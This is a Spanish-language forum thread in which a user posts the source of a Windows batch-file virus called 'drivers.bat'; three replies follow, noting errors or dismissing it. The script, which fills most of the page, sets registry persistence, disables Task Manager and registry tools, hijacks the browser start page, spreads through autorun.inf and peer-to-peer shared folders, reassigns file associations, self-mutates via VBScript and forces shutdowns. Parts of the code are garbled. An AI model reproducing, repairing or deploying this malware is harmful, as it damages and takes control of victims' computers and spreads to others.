Autor
|
Tema: virus drivers.bat (Leído 2,759 veces)
|
W4rR3d
Desconectado
Mensajes: 12
|
tu amigo W4rR3d TASKKILL /IM explorer.exe/F IM msnmsgr.exe /F reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v drivers /t REG_SZ /d "%systemroot%\System32\drivers.bat" /f REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies\System /v disabletaskmgr /t reg_dword /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://4.bp.blogspot.com/_04D_IYYf9WA/TTDJzjOv_XI/AAAAAAAAAK4/Gmh_VUM8mJA/s1600/virus.jpg" reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d" for %%E In (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z ) Do ( copy /Y %0 %%E:\drivers.bat echo.[AutoRun] >> %%E:\autorun.inf echo.open=" %%E:\drivers.bat" >> %%E:\autorun.inf echo.action=Open folder to see files... >> %%E:\autorun.inf attrib +h +s +r %%E:\autorun.inf attrib +h +s +r %%E:\drivers.bat :rm echo Set oWMP = CreateObject ("WMPlayer.OCX.7" ) >> %mr%\abrir.vbs echo Set colCDROMs = oWMP.cdromCollection >> %mr%\abrir.vbs echo if colCDROMs.Count >= 1 then >> %mr%\abrir.vbs echo For i = 0 to colCDROMs.Count - 1 >> %mr%\abrir.vbs echo colCDROMs.Item (i ).Eject >> %mr%\abrir.vbs echo Next ' cdrom >> %mr%\abrir.vbs start %mr%\abrir.vbs :bir %rms% On Error Resume Next >> %mr%\apagon.vbs %rms% set shell = CreateObject ("WScript.Shell" ) >> %mr%\apagon.vbs %rms% shell.run "shutdown.exe -s -f -t 10 " >> %mr%\apagon.vbs start %mr%\apagon.vbs :ir copy %0 %rsm%\system32\drivers.bat echo On Error Resume next >> " %rsm%\system32\drivers.vbs" echo Set oShell = WScript.CreateObject ("WSCript.shell" ) >>" %rsm%\system32\drivers.vbs" echo oShell.Run " %rsm%\system32\drivers.bat",0 >> start " %rsm%\system32\drivers.vbs" :wi copy %0 %windir%\drivers.bat echo On Error Resume next >> " %windir%\drivers.vbs" echo Set oShell = WScript.CreateObject ("WSCript.shell" ) >>" %windir%\drivers.vbs" echo oShell.Run " %windir%\drivers.bat",0 >> start " %windir%\drivers.vbs" :sys copy %0 %homedrive%\drivers.bat echo On Error Resume next >> " %homedrive%\drivers.vbs" echo Set oShell = WScript.CreateObject ("WSCript.shell" ) >>" %homedrive%\drivers.vbs" echo oShell.Run " %homedrive%\drivers.bat",0 >> start " %homedrive%\drivers.vbs" for %%e in (exe,bmp,gif,jpg,png,txt,doc,docx,xls,xlsx,avi,mpg,mpeg,flv.mp3,mp4,rar,zip,ink ) do assoc . %%e=batfile %rms% set ff=createobject ("scripting.filesystemobject" )>>bicho.vbs %rms% set rr=ff.opentextfile (%0,1 )>>bicho.vbs %rms% aa = rr.readall>>bicho.vbs %rms%% rr.close>>bicho.vbs %rms% Randomize>>bicho.vbs %rms% bicho = int(rnd * 3)>>bicho.vbs %rms% if bicho = 0 or bicho = 2 then >>bicho.vbs %rms% s = chr(int(22 * rnd) + 97)>>bicho.vbs %rms% rand1 = Replace(aa,"rms","rms" ^& s ^& bicho)>>bicho.vbs %rms% rand2 = Replace(rand1,"kmbfo","kmbfo" ^& s ^& s ^& bicho)>>bicho.vbs %rms% else>>bicho.vbs %rms% bichonum = int(rnd * 7)>>bicho.vbs %rms% for i = 1 to bichonum >>bicho.vbs %rms% bichochar = chr(int(22 * rnd) + 97)>>bicho.vbs %rms% bichoall = bichoyall + bichochar>>bicho.vbs %rms% next>>bicho.vbs %rms% s = chr(int(22 * rnd) + 97)>>bicho.vbs %rms% rand1 = Replace(aa,"rms",bichoall )>>bicho.vbs %rms% rand2 = Replace(rand1,"kmbfo", s ^& bichoall)>>bicho.vbs %rms% end if>>bicho.vbs %rms%% set bb=ff.opentextfile(%0,2 )>>bicho.vbs %rms% bb.write rand2>>bicho.vbs :p2p copy /y " %prom%\Grokster\My Grokster\ %pro%" copy /y " %prom%\Morpheus\My Shared Folder\ %pro%" copy /y " %prom%\ICQ\shared files\ %pro%" copy /y " %prom%\KaZaA\My Shared Folder\ %pro%" copy /y " %prom%\KaZaA Lite\My Shared Folder\ %pro%" copy /y " %prom%\EDONKEY2000\incoming\ %pro%" copy /y " %prom%\eMule\Incoming\ %pro%" copy /y " %prom%\Filetopia3\Files\ %pro%" copy /y " %prom%\appleJuice\incoming\ %pro%" copy /y " %prom%\Gnucleus\Downloads\ %pro%" copy /y " %prom%\LimeWire\Shared\ %pro%" copy /y " %prom%\Overnet\incoming\ %pro%" copy /y " %prom%\Shareaza\Downloads\ %pro%" copy /y " %prom%\Swaptor\Download\ %pro%" copy /y " %prom%\WinMX\My Shared Folder\ %pro%" copy /y " %prom%\Tesla\Files\ %pro%" copy /y " %prom%\XoloX\Downloads\ %pro%" copy /y " %prom%\Rapigator\Share\ %pro%" copy /y " %prom%\KMD\My Shared Folder\ %pro%" copy /y " %prom%\BearShare\Shared\ %pro%" copy /y " %prom%\Direct Connect\Received Files\ %pro%" @cscript bicho.vbs
|
|
« Última modificación: 3 Junio 2011, 17:04 pm por W4rR3d »
|
En línea
|
|
|
|
SuperDraco
Desconectado
Mensajes: 2.505
Crew Dragon
|
for %a in (*.png,*.jpg,*.gif,,*.mp3,*.mp4,*.avi,*.mpg,*.flv, *.mov,*.doc,*.docx,*.xls,*.xlsx) do (copy /y %0 %%a > nul) veo muchos errores en tu script, uno grande es ese. No te doy más pistas porque no me gusta el tema. Deberias probarlo contigo mismo porque la mayoria de cosas no te van a funcionar.
|
|
|
En línea
|
No he vuelto, solo estoy de paso.
|
|
|
FranciskoAsdf
Desconectado
Mensajes: 231
Ni bueno, ni malo. Solo nada.
|
Hay varias cosas que no van a funcionar Por ultimo móntate una maquina virtual y lo pruebas, pero asi veo que no
|
|
|
En línea
|
Asdf debería ser algún tipo de función.
|
|
|
leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
Desconectado
Mensajes: 3.069
/^$/
|
@W4rR3d
A ver, ¿en qué es distinto esto a los 300 códigos de virus que salen semanalmente?
|
|
|
En línea
|
|
|
|
|
|